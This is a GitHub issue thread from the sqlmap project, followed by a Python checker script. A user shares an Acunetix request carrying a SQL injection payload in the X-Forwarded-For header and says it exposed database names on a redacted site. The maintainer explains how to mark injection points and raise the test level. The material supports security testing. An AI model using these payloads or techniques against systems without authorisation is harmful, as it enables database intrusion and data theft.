sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

sqlmap -r file and custom payload in GET method #4223

Closed hastalamuerte closed 4 years ago

hastalamuerte commented 4 years ago

Hello, I got a report from Acunetix; it looks like:

GET / HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: -1' OR 321=6 AND 000761=000761 or '9Blrmidy'='
Cookie: __ddg1=mBHvTbSQ4TC7RkTGcj9y;PHPSESSID=0hq5a7n7c84qli2gunnk6nv785
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: **.com
Connection: Keep-alive

I put it in a txt file and ran it with -r. sqlmap finds only a blind SQL injection with a different payload in X-Forwarded-For, and yes it works - I get database names. How can I directly set the payload and parameter (it's not a POST, so I think --data will not work)? Or maybe can I teach sqlmap to use the information from txt files like that to get a fast and direct injection?

Thank you

hastalamuerte commented 4 years ago

SQL query - SELECT database() informationschema and -1' OR 2+761-761-1=0+0+0+1 or '9Blrmidy'=' => TRUE

but sqlmap doesn't see the payload in the file.. (((( also it tests two X-Forwarded-For parameters #1 and #2...

stamparm commented 4 years ago

1) sqlmap doesn't like SQL injection payloads inside provided data. You are also being explicitly warned by sqlmap in case of your request file
2) It has to have access to the raw/valid data
3) In your case, that would be something like:

....
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1.2.3.4*
X-Requested-With: XMLHttpRequest
...

Notice that I've explicitly used an asterisk (*) to mark where sqlmap should start injection attempts.

4) If you want to use OR payloads you'll need to raise the risk level (e.g. --level=3)
5) Your payload looks frivolous, thus I am not sure that sqlmap is the biggest problem here
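As an added example (not from this thread or from the sqlmap project): a small Python pre-check for a `-r` request file that reports which headers carry the `*` injection marker and which headers still contain a scanner payload like the one in the Acunetix report, i.e. the two points raised above. The sample request, the placeholder host and the payload heuristic are constructed assumptions for illustration.

```python
"""Sanity-check a raw HTTP request file before handing it to sqlmap -r."""
import re
from typing import Dict, List, Tuple

# Constructed sample modelled on the request in this thread: the X-Forwarded-For
# value is clean and carries the '*' marker; the host is a placeholder.
SAMPLE_REQUEST = """GET / HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0
X-Forwarded-For: 1.2.3.4*
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=0hq5a7n7c84qli2gunnk6nv785
Connection: Keep-alive
"""

# Heuristic (assumption, not sqlmap's own check) for leftover scanner payloads:
# quotes, boolean "OR x=y" / "AND x=y" clauses, or a trailing SQL comment.
PAYLOAD_RE = re.compile(r"'|\"|\bOR\b\s+\S+=\S+|\bAND\b\s+\S+=\S+|--\s", re.I)


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw request into its request line and a name->value header map."""
    lines = raw.splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the headers; a body (if any) follows
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers


def find_markers(headers: Dict[str, str]) -> List[str]:
    """Headers whose value contains a '*' marker. The literal '*/*' media range
    in Accept is treated as data here (this script's assumption)."""
    return [n for n, v in headers.items() if "*" in v.replace("*/*", "")]


def find_payloads(headers: Dict[str, str]) -> List[str]:
    """Headers whose value still looks like an injection payload."""
    return [n for n, v in headers.items() if PAYLOAD_RE.search(v)]


def check(raw: str) -> Tuple[List[str], List[str]]:
    """Return (headers with markers, headers with leftover payloads)."""
    _, headers = parse_request(raw)
    return find_markers(headers), find_payloads(headers)


if __name__ == "__main__":
    markers, payloads = check(SAMPLE_REQUEST)
    print("marker in:", markers, "| payload left in:", payloads)
```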